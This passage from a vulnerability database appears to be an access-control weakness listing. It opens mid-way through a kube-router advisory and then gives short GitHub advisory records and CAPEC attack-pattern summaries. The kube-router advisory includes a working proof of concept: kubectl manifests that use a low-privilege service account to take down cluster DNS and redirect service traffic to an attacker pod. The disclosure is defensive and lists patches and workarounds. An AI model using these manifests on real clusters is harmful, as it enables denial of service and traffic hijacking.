[CVE-2020-8554](https://github.com/kubernetes/kubernetes/issues/97076) (CVSS 5.0/Medium), describing it as a design limitation with no planned in-tree fix. The reference service proxy (kube-proxy) and other third-party service proxy implementations exhibit the same behavior. kube-router\u0027s `--service-external-ip-range` parameter provides more defense-in-depth than most alternatives -- the gap is that this defense did not extend to the proxy module.\n\n## Details\n\n### Vulnerability Description\n\nKube-router\u0027s proxy module does not validate externalIPs or loadBalancer IPs before programming them into the node\u0027s network configuration:\n\n1. **Unconditional externalIPs copy**: `buildServicesInfo()` directly `copy()`s `Service.spec.ExternalIPs` without any range validation\n2. **Unconditional LoadBalancer IP trust**: The same function appends `status.loadBalancer.ingress[].ip` without verification\n3. **`--service-external-ip-range` not checked by proxy**: This parameter is only referenced in the netpol module, the proxy module never checks it\n4. **Cluster-wide impact**: IPs are bound to `kube-dummy-if` on all cluster nodes, added to IPVS, and added to the `kube-router-svip` ipset\n5. **No conflict detection**: ExternalIPs that overlap with existing ClusterIPs (e.g., kube-dns `10.96.0.10`) cause the legitimate IPVS real servers to be fully replaced by the attacker\u0027s endpoints during the stale-endpoint cleanup cycle, redirecting all traffic for that VIP:port to attacker-controlled pods\n\n### Vulnerable Code Locations\n\n**File**: `pkg/controllers/proxy/network_services_controller.go`\n\n**Lines 866, 898** - Unconditional externalIPs copy:\n```go\nexternalIPs: make([]string, len(svc.Spec.ExternalIPs)),\ncopy(svcInfo.externalIPs, svc.Spec.ExternalIPs) // No range check\n```\n\n**Lines 900-904** - Unconditional LoadBalancer IP trust:\n```go\nfor _, lbIngress := range svc.Status.LoadBalancer.Ingress {\n if len(lbIngress.IP) \u003e 0 {\n svcInfo.loadBalancerIPs = append(svcInfo.loadBalancerIPs, lbIngress.IP)\n }\n}\n```\n\n**File**: `pkg/controllers/proxy/utils.go`\n\n**Lines 425-461** - `getAllExternalIPs()` merges IPs without range validation:\n```go\nfunc getAllExternalIPs(svc *serviceInfo, includeLBIPs bool) map[v1.IPFamily][]net.IP {\n // Only performs IP parsing and deduplication, no range checking\n}\n```\n\n**File**: `pkg/controllers/proxy/service_endpoints_sync.go`\n\n**Lines 460-464** - Binds arbitrary IPs to kube-dummy-if via netlink:\n```go\nerr = nsc.ln.ipAddrAdd(dummyVipInterface, externalIP.String(), nodeIP.String(), true)\n```\n\n**File**: `pkg/controllers/netpol/network_policy_controller.go`\n\n**Lines 960-967** - `--service-external-ip-range` is ONLY referenced here:\n```go\nfor _, externalIPRange := range config.ExternalIPCIDRs {\n _, ipnet, err := net.ParseCIDR(externalIPRange)\n npc.serviceExternalIPRanges = append(npc.serviceExternalIPRanges, *ipnet)\n}\n// The proxy module never references ExternalIPCIDRs\n```\n\n### Root Cause\n\nThe proxy module was implemented without externalIP range validation. The `--service-external-ip-range` parameter creates a gap between administrator expectations and actual enforcement: administrators may believe externalIPs are restricted to the configured range, but the proxy module (which actually configures IPVS and network interfaces) does not enforce this restriction.\n\nThis is consistent with the broader Kubernetes ecosystem. [CVE-2020-8554](https://github.com/kubernetes/kubernetes/issues/97076) documents the same fundamental issue: the Kubernetes API allows `Service.spec.externalIPs` to be set by any user with Service create/update permissions, and service proxies program these IPs into the data plane without validation. The upstream project\u0027s recommended mitigation is API-level admission control (e.g., `DenyServiceExternalIPs` feature gate, or admission webhooks).\n\n## PoC\n\n### Environment Setup\n\n```bash\n# Kind cluster: 1 control-plane + 1 worker\ncat \u003e kind-config.yaml \u003c\u003cEOF\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nname: kube-router-test\nnetworking:\n disableDefaultCNI: true\n kubeProxyMode: \"none\"\nnodes:\n- role: control-plane\n- role: worker\nEOF\n\nkind create cluster --config kind-config.yaml\nkubectl apply -f https://raw.githubusercontent.com/cloudnativelabs/kube-router/v2.7.1/daemonset/kubeadm-kuberouter.yaml\nkubectl -n kube-system wait --for=condition=ready pod -l k8s-app=kube-router --timeout=120s\n\n# Create low-privileged attacker\nkubectl create namespace attacker-ns\nkubectl apply -f - \u003c\u003cEOF\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n name: cicd-developer\n namespace: attacker-ns\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n namespace: attacker-ns\n name: service-creator\nrules:\n- apiGroups: [\"\"]\n resources: [\"services\"]\n verbs: [\"get\", \"list\", \"create\", \"update\", \"patch\", \"delete\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n name: service-creator-binding\n namespace: attacker-ns\nsubjects:\n- kind: ServiceAccount\n name: cicd-developer\n namespace: attacker-ns\nroleRef:\n kind: Role\n name: service-creator\n apiGroup: rbac.authorization.k8s.io\nEOF\n```\n\n### Exploitation\n\n#### Scenario A: Arbitrary VIP Binding\n\n```bash\nkubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - \u003c\u003cEOF\napiVersion: v1\nkind: Service\nmetadata:\n name: malicious-externalip\n namespace: attacker-ns\nspec:\n selector: { app: non-existent }\n ports: [{ port: 80, targetPort: 80 }]\n externalIPs: [\"192.168.100.50\", \"10.200.0.1\", \"172.16.0.99\"]\nEOF\n```\n\nResult: All 3 IPs appear on kube-dummy-if, IPVS rules, and LOCAL routing table on ALL cluster nodes. No validation, no warning, no audit log.\n\n#### Scenario B: Cluster DNS Takedown (Single Command)\n\n```bash\nkubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - \u003c\u003cEOF\napiVersion: v1\nkind: Service\nmetadata:\n name: dns-dos-svc\n namespace: attacker-ns\nspec:\n selector: { app: non-existent-app }\n ports:\n - { name: dns-udp, port: 53, targetPort: 5353, protocol: UDP }\n - { name: dns-tcp, port: 53, targetPort: 5353, protocol: TCP }\n externalIPs: [\"10.96.0.10\"]\nEOF\n```\n\nBefore attack: kube-dns has 2 healthy real servers (CoreDNS pods).\nAfter attack: The legitimate CoreDNS endpoints are fully evicted from the IPVS virtual service via the `activeServiceEndpointMap` overwrite and stale-endpoint cleanup cycle. If the attacker\u0027s Service has a selector pointing to attacker-controlled pods, those pods become the sole real servers for `10.96.0.10:53` -- receiving 100% of cluster DNS traffic. If no matching pods exist, the virtual service has zero real servers and DNS queries blackhole.\nAfter deleting the attacker\u0027s Service: DNS immediately recovers.\n\n#### Scenario C: `--service-external-ip-range` Bypass\n\nWith `--service-external-ip-range=10.200.0.0/16` configured, `192.168.100.50` (outside the range) is still bound. The proxy module never checks this parameter.\n\n#### Scenario D: Arbitrary VIP Binding With Attacker Backend\n\nA user can bind an arbitrary IP as a VIP on all cluster nodes. For previously unused IPs, this creates a new IPVS virtual service directing traffic to the attacker\u0027s pods. For IPs that match an existing ClusterIP on the same port, the attacker\u0027s endpoints replace the legitimate endpoints entirely (see Scenario B for the mechanism).\n\n```bash\nkubectl -n attacker-ns run attacker-backend --image=nginx:alpine --port=80\nkubectl -n attacker-ns exec attacker-backend -- sh -c \u0027echo \"HIJACKED-BY-ATTACKER\" \u003e /usr/share/nginx/html/index.html\u0027\nkubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - \u003c\u003cEOF\napiVersion: v1\nkind: Service\nmetadata:\n name: hijack-svc\n namespace: attacker-ns\nspec:\n selector: { run: attacker-backend }\n ports: [{ port: 80, targetPort: 80 }]\n externalIPs: [\"10.50.0.1\"]\nEOF\n```\n\n```\n$ curl http://10.50.0.1/\nHIJACKED-BY-ATTACKER\n```\n\n## Impact\n\n**Confidentiality**: None - No direct data leakage\n\n**Integrity**: Low - An attacker can bind arbitrary VIPs on cluster nodes and direct traffic to attacker-controlled pods. When an externalIP matches an existing ClusterIP on the same port, the legitimate endpoints are fully replaced by the attacker\u0027s endpoints via the IPVS stale-endpoint cleanup cycle -- the attacker receives 100% of that traffic. However, this is bounded to specific `(IP, protocol, port)` tuples that the attacker explicitly targets, is immediately visible via `kubectl get svc`, and constitutes traffic redirection rather than transparent interception. This is consistent with the upstream Kubernetes assessment of CVE-2020-8554 (I:Low).\n\n**Availability**: High - A single command can take down cluster DNS, affecting all pods\u0027 name resolution, service discovery, and control plane communication\n\n### Attack Scenarios\n\n1. **Cluster-wide DNS DoS / traffic co-opt**: A user creates one Service with an externalIP matching the kube-dns ClusterIP on port 53. The legitimate CoreDNS endpoints are evicted and the attacker\u0027s pods receive all DNS queries cluster-wide.\n2. **Arbitrary VIP binding**: A user binds unused IPs as VIPs on all cluster nodes, directing traffic to attacker-controlled pods\n3. **ClusterIP conflict exploitation**: A user targets any existing ClusterIP:port combination to replace the legitimate service\u0027s endpoints with their own\n4. **Security configuration bypass**: `--service-external-ip-range` is not enforced by the proxy module\n5. **Trust boundary violation**: Namespace-scoped permissions affect all cluster nodes\n\n## Affected Versions\n\n- All kube-router v2.x versions (including latest v2.7.1)\n- `buildServicesInfo()` has never referenced `ExternalIPCIDRs`\n\n## Patched Versions\n\n[v2.8.0](https://github.com/cloudnativelabs/kube-router/releases/tag/v2.8.0) and beyond\n\n## Workarounds\n\n1. **Enable DenyServiceExternalIPs Feature Gate**: Add `--feature-gates=DenyServiceExternalIPs=true` to the API server\n2. **Deploy admission policy**: Use Kyverno/OPA/ValidatingAdmissionPolicy to restrict Services with externalIPs\n3. **Restrict Service creation RBAC**: Tighten RBAC to prevent low-privileged users from creating Services\n4. **Monitor Service changes**: Enable Kubernetes audit logging for Service create/update operations\n5. **Apply BGP prefix filtering**: If kube-router is configured to advertise externalIPs or ClusterIPs via BGP, configure BGP peers (routers, firewalls) to only accept announcements for expected prefix ranges. This prevents a malicious externalIP from being advertised to and routed by the broader network.\n\n## Mitigation\n\n### Recommended Permanent Fix\n\n1. **Proxy module should check `--service-external-ip-range`**: Validate externalIPs against configured ranges in `buildServicesInfo()`\n2. **Default deny when unconfigured**: When `--service-external-ip-range` is not set, reject all externalIPs\n3. **IP conflict detection**: Check externalIPs against existing ClusterIPs and NodeIPs\n4. **Audit logging**: Log all externalIP configuration changes\n\n## Credits\n\n- @b0b0haha (Reporter)\n- @j311yl0v3u (Reporter)",
"id": "GHSA-phqm-jgc3-qf8g",
"modified": "2026-03-30T14:01:29Z",
"published": "2026-03-17T17:12:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/cloudnativelabs/kube-router/security/advisories/GHSA-phqm-jgc3-qf8g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32254"
},
{
"type": "WEB",
"url": "https://github.com/cloudnativelabs/kube-router/commit/a1f0b2eea3ee0f66b9a5b5c49dcb714619ccd456"
},
{
"type": "PACKAGE",
"url": "https://github.com/cloudnativelabs/kube-router"
},
{
"type": "WEB",
"url": "https://github.com/cloudnativelabs/kube-router/releases/tag/v2.8.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "Kube-router Proxy Module Blindly Trusts ExternalIPs/LoadBalancer IPs Enabling Cluster-Wide Traffic Hijacking and DNS DoS"
}
GHSA-PHRM-6C7X-J62R
Vulnerability from github – Published: 2022-10-28 12:00 – Updated: 2022-11-01 12:00A vulnerability was found in seccome Ehoney. It has been rated as critical. This issue affects some unknown processing of the file /api/public/signup. The manipulation leads to improper access controls. The identifier VDB-212417 was assigned to this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2022-3735"
],
"database_specific": {
"cwe_ids": [
"CWE-266",
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-10-28T08:15:00Z",
"severity": "CRITICAL"
},
"details": "A vulnerability was found in seccome Ehoney. It has been rated as critical. This issue affects some unknown processing of the file /api/public/signup. The manipulation leads to improper access controls. The identifier VDB-212417 was assigned to this vulnerability.",
"id": "GHSA-phrm-6c7x-j62r",
"modified": "2022-11-01T12:00:37Z",
"published": "2022-10-28T12:00:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3735"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.212417"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-PHW2-9X34-48CX
Vulnerability from github – Published: 2024-02-29 03:33 – Updated: 2024-02-29 03:33The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'submit_review' function in all versions up to, and including, 5.38.12. This makes it possible for unauthenticated attackers to submit reviews with arbitrary email addresses regardless of whether reviews are globally enabled.
{
"affected": [],
"aliases": [
"CVE-2024-1044"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-29T01:43:38Z",
"severity": "MODERATE"
},
"details": "The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the \u0027submit_review\u0027 function in all versions up to, and including, 5.38.12. This makes it possible for unauthenticated attackers to submit reviews with arbitrary email addresses regardless of whether reviews are globally enabled.",
"id": "GHSA-phw2-9x34-48cx",
"modified": "2024-02-29T03:33:15Z",
"published": "2024-02-29T03:33:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1044"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12\u0026old=3032310\u0026new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0\u0026new=3032310\u0026sfp_email=\u0026sfph_mail="
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4420c334-1ea4-4549-b391-150702abc2f8?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PHXP-PCMX-P36C
Vulnerability from github – Published: 2022-05-13 01:33 – Updated: 2022-05-13 01:33WebAccess Versions 8.3.2 and prior. During installation, the application installer disables user access control and does not re-enable it after the installation is complete. This could allow an attacker to run elevated arbitrary code.
{
"affected": [],
"aliases": [
"CVE-2018-17908"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-10-29T18:29:00Z",
"severity": "HIGH"
},
"details": "WebAccess Versions 8.3.2 and prior. During installation, the application installer disables user access control and does not re-enable it after the installation is complete. This could allow an attacker to run elevated arbitrary code.",
"id": "GHSA-phxp-pcmx-p36c",
"modified": "2022-05-13T01:33:46Z",
"published": "2022-05-13T01:33:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-17908"
},
{
"type": "WEB",
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/105736"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1041957"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-PHXQ-3M6P-P9Q4
Vulnerability from github – Published: 2022-11-30 12:30 – Updated: 2022-12-02 00:30A vulnerability, which was classified as critical, was found in SourceCodester Event Registration System 1.0. Affected is an unknown function. The manipulation of the argument cmd leads to unrestricted upload. It is possible to launch the attack remotely. VDB-214590 is the identifier assigned to this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2022-4232"
],
"database_specific": {
"cwe_ids": [
"CWE-266",
"CWE-284",
"CWE-434"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-11-30T12:15:00Z",
"severity": "CRITICAL"
},
"details": "A vulnerability, which was classified as critical, was found in SourceCodester Event Registration System 1.0. Affected is an unknown function. The manipulation of the argument cmd leads to unrestricted upload. It is possible to launch the attack remotely. VDB-214590 is the identifier assigned to this vulnerability.",
"id": "GHSA-phxq-3m6p-p9q4",
"modified": "2022-12-02T00:30:24Z",
"published": "2022-11-30T12:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4232"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.214590"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-1
Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.
Mitigation MIT-46
Strategy: Separation of Privilege
- Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
- Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
CAPEC-19: Embedding Scripts within Scripts
An adversary leverages the capability to execute their own script by embedding it within other scripts that the target software is likely to execute due to programs' vulnerabilities that are brought on by allowing remote hosts to execute scripts.
CAPEC-441: Malicious Logic Insertion
An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.
CAPEC-478: Modification of Windows Service Configuration
An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to execute a malicious binary in place of an existing service.
CAPEC-479: Malicious Root Certificate
An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.
CAPEC-502: Intent Spoof
An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component trusts the intent's action without verififcation, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact.
CAPEC-503: WebView Exposure
An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView's addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.
CAPEC-536: Data Injected During Configuration
An attacker with access to data files and processes on a victim's system injects malicious data into critical operational data during configuration or recalibration, causing the victim's system to perform in a suboptimal manner that benefits the adversary.
CAPEC-546: Incomplete Data Deletion in a Multi-Tenant Environment
An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.
CAPEC-550: Install New Service
When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. Services are usually run with elevated privileges.
CAPEC-551: Modify Existing Service
When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.
CAPEC-552: Install Rootkit
An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.
CAPEC-556: Replace File Extension Handlers
When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. Applications can modify the file handler for a given file extension to call an arbitrary program when a file with the given extension is opened.
CAPEC-558: Replace Trusted Executable
An adversary exploits weaknesses in privilege management or access control to replace a trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.
CAPEC-562: Modify Shared File
An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.
CAPEC-563: Add Malicious File to Shared Webroot
An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.
CAPEC-564: Run Software at Logon
Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.
CAPEC-578: Disable Security Software
An adversary exploits a weakness in access control to disable security tools so that detection does not occur. This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.